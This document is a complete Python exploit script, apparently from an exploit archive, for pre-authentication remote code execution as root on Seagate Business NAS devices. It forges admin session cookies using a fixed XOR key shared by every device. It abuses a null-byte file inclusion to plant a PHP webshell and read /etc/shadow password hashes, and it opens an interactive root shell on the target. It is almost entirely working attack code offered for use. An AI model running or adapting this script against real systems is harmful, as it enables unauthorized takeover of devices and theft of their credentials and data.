Seagate Business NAS 2014.00319 Remote Code Execution

`#!/usr/bin/env python  
#  
# Seagape  
# =======  
# Seagate Business NAS pre-authentication remote code execution  
# exploit as root user.  
#  
# by OJ Reeves (@TheColonial) - for full details please see  
# https://beyondbinary.io/advisory/seagate-nas-rce/  
#  
# Usage  
# =====  
# seagape.py <ip> <port> [-c [ua]]  
#  
# - ip : ip or host name of the target NAS  
# - port : port of the admin web ui  
# - -c : (optional) create a cookie which will give admin access.  
# Not specifying this flag results in webshell installation.  
# - ua : (optional) the user agent used by the browser for the  
# admin session (UA must match the target browser).  
# Default value is listed below  
#  
# Example  
# =======  
# Install and interact with the web shell:  
# seagape.py 192.168.0.1 80  
#  
# Create admin cookie  
# seagape.py 192.168.0.1 80 -c  
  
import base64  
import hashlib  
import itertools  
import os  
import re  
import socket  
import sys  
import urllib  
import urllib2  
import uuid  
import xml.sax.saxutils  
  
if len(sys.argv) < 3:  
print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0])  
sys.exit(1)  
  
# Every Seagate nas has the same XOR key. Great.  
XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'  
  
# This is the User agent we'll use for most of the requests  
DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'  
  
# This is the description we're going to be reading from  
LFI_FILE = '/etc/devicedesc'  
  
# the base globals that will hold our state  
host = sys.argv[1]  
port = int(sys.argv[2])  
cis = ''  
hostname = ''  
webshell = str(uuid.uuid1()) + ".php"  
  
def chunks(s, n):  
for i in xrange(0, len(s), n):  
yield s[i:i + n]  
  
def forward_interleave(a, b):  
return ''.join(itertools.chain(*zip(itertools.cycle(a), b)))  
  
def xor(s, k):  
return ''.join(chr(ord(a) ^ ord(b)) for a, b in itertools.izip(s, itertools.cycle(k)))  
  
def sha1(s):  
return hashlib.sha1(s).hexdigest()  
  
def decode(s):  
f = xor(s, XOR_KEY)  
return ''.join(chr(ord(a) ^ ord(b)) for a, b in chunks(f, 2))  
  
def encode(s):  
s = forward_interleave(sha1(s), s)  
s = ''.join(a + chr(ord(a) ^ ord(b)) for a, b in chunks(s, 2))  
return xor(s, XOR_KEY)  
  
def make_request(uri = "/", ci_session = None, headers = None, post_data = None):  
  
method = 'GET'  
  
if not headers:  
headers = {}  
  
headers['Host'] = host  
  
if 'User-Agent' not in headers:  
headers['User-Agent'] = DEFAULT_UA  
  
if 'Accept' not in headers:  
headers['Accept'] = 'text/html'  
  
if post_data:  
method = 'POST'  
post_data = urllib.urlencode(post_data)  
headers['Content-Type'] = 'application/x-www-form-urlencoded'  
  
if ci_session:  
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))  
headers['Cookie'] = 'ci_session={0}'.format(ci_session)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
  
http = ""  
http += "{0} {1} HTTP/1.1\r\n".format(method, uri)  
  
for h in headers:  
http += "{0}: {1}\r\n".format(h, headers[h])  
  
if post_data:  
http += "Content-Length: {0}\r\n".format(len(post_data))  
  
http += "\r\n"  
  
if post_data:  
http += post_data  
  
s.send(http)  
  
result = ""  
while True:  
data = s.recv(1024)  
if not data:  
break  
result += data  
  
s.close()  
  
return result  
  
def get_ci_session():  
resp = make_request()  
  
for l in resp.split("\r\n"):  
m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l)  
for name, value in m:  
if name == 'ci_session' and len(value) > 40:  
return decode(base64.b64decode(urllib.unquote(value)))  
  
print "Unable to establish session with {0}".format(host)  
sys.exit(1)  
  
def add_string(ci_session, key, value):  
prefix = 's:{0}:"{1}";s:'.format(len(key), key)  
if prefix in ci_session:  
ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session)  
else:  
# doesn't exist, so we need to add it to the start and the end.  
count = int(ci_session.split(':')[1]) + 1  
ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session)  
return ci_session  
  
def set_admin(ci_session):  
return add_string(ci_session, "is_admin", "yes")  
  
def set_language(ci_session, lang):  
return add_string(ci_session, "language", lang)  
  
def include_file(ci_session, file_path):  
if file_path[0] == '/':  
file_path = '../../../../../..' + file_path  
return set_language(ci_session, file_path + "\x00")  
  
def read_file(file_path, post_data = None):  
resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data)  
return resp  
  
def hashdump():  
shadow = read_file('/etc/shadow')  
for l in shadow.split("\n"):  
if l and ':!:' not in l and ':x:' not in l:  
parts = l.split(':')  
print "{0}:{1}".format(parts[0], parts[1])  
  
def cmd(command):  
headers = {  
'Content-Type' : 'application/x-www-form-urlencoded',  
'Accept' : '*/*',  
'User-Agent' : DEFAULT_UA  
}  
  
post_data = urllib.urlencode({'c' : command})  
headers['Content-Type'] = 'application/x-www-form-urlencoded'  
  
ci_session = urllib.quote(base64.b64encode(encode(cis)))  
headers['Cookie'] = 'ci_session={0}'.format(ci_session)  
  
url = 'http://{0}:{1}/{2}'.format(host, port, webshell)  
req = urllib2.Request(url, headers = headers, data = post_data)  
  
return urllib2.urlopen(req).read()  
  
def shell():  
running = True  
while running:  
c = raw_input("Shell ({0}) $ ".format(post_id))  
if c != 'quit' and c != 'exit':  
cmd(c)  
else:  
running = False  
  
def show_admin_cookie(user_agent):  
ci_session = add_string(cis, 'is_admin', 'yes')  
ci_session = add_string(ci_session, 'username', 'admin')  
ci_session = add_string(ci_session, 'user_agent', user_agent)  
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))  
print "Session cookies are bound to the browser's user agent."  
print "Using user agent: " + user_agent  
print "ci_session=" + ci_session  
  
def show_version():  
print "Firmware Version: {0}".format(get_firmware_version())  
  
def show_cookie():  
print cis  
  
def show_help():  
print ""  
print "Seagape v1.0 -- Interactive Seagate NAS Webshell"  
print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"  
print " - https://beyondbinary.io/bbsec/001"  
print "==========================================================================="  
print "version - Print the current firmware version to screen."  
print "dumpcookie - Print the current cookie to screen."  
print "admincookie <ua> - Create an admin login cookie (ua == user agent string)."  
print " Add to your browser and access ANY NAS box as admin."  
print "help - Show this help."  
print "exit / quit - Run for the hills."  
print "<anything else> - Execute the command on the server."  
print ""  
  
def execute(user_input):  
result = True  
parts = user_input.split(' ')  
c = parts[0]  
  
if c == 'admincookie':  
ua = DEFAULT_UA  
if len(parts) > 1:  
ua = ' '.join(parts[1:])  
show_admin_cookie(ua)  
elif c == 'dumpcookie':  
show_cookie()  
elif c == 'version':  
show_version()  
elif c == 'help':  
show_help()  
elif c == 'quit' or c == 'exit':  
remove_shell()  
result = False  
else:  
print cmd(user_input)  
return result  
  
def get_firmware_version():  
resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043",  
ci_session = acis)  
return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]  
  
def install_shell():  
resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043",  
ci_session = acis)  
existing_setup = ''  
for l in resp.split("\r\n"):  
if 'general_setup' in l:  
existing_setup = l  
break  
  
# generate the shell and its installer  
exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>")  
installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post)  
write_php = xml.sax.saxutils.quoteattr(installer)[1:-1]  
start = existing_setup.index('" description="') + 15  
end = existing_setup.index('"', start)  
updated_setup = existing_setup[0:start] + write_php + existing_setup[end:]  
  
# write the shell to the description  
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",  
ci_session = acis,  
headers = { },  
post_data = { 'general_setup' : updated_setup })  
  
# invoke the installer  
read_file(LFI_FILE)  
  
# remove the installer  
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",  
ci_session = acis,  
headers = { },  
post_data = { 'general_setup' : existing_setup })  
  
def remove_shell():  
return cmd('rm -f {0}'.format(webshell))  
  
print "Establishing session with {0} ...".format(host)  
cis = get_ci_session()  
  
if len(sys.argv) >= 4 and sys.argv[3] == '-c':  
ua = DEFAULT_UA  
if len(sys.argv) > 4:  
ua = sys.argv[4]  
show_admin_cookie(ua)  
else:  
print "Configuring administrative access ..."  
acis = add_string(cis, 'is_admin', 'yes')  
acis = add_string(acis, 'username', 'admin')  
  
print "Installing web shell (takes a while) ..."  
install_shell()  
  
print "Extracting id and hostname ..."  
identity = cmd('whoami').strip()  
hostname = cmd('cat /etc/hostname').strip()  
show_help()  
  
running = True  
while running:  
try:  
user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname))  
running = execute(user_input)  
except:  
print "Something went wrong. Try again."  
`